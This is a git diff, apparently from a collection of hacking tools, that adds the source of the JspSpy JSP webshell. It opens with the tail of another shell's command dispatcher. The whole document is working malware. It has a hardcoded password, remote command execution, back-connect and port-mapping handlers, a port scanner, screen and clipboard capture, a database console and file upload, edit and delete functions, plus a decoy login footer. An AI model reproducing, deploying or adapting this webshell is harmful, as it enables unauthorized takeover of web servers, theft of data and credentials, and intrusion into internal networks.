+ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP_66/other/jspspy_k8.jsp b/jsp/hackk8/JSP_66/other/jspspy_k8.jsp new file mode 100644 index 0000000..4cd20f1 --- /dev/null +++ b/jsp/hackk8/JSP_66/other/jspspy_k8.jsp @@ -0,0 +1,2323 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +private static final String PW = "k8"; +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(" "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒) : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

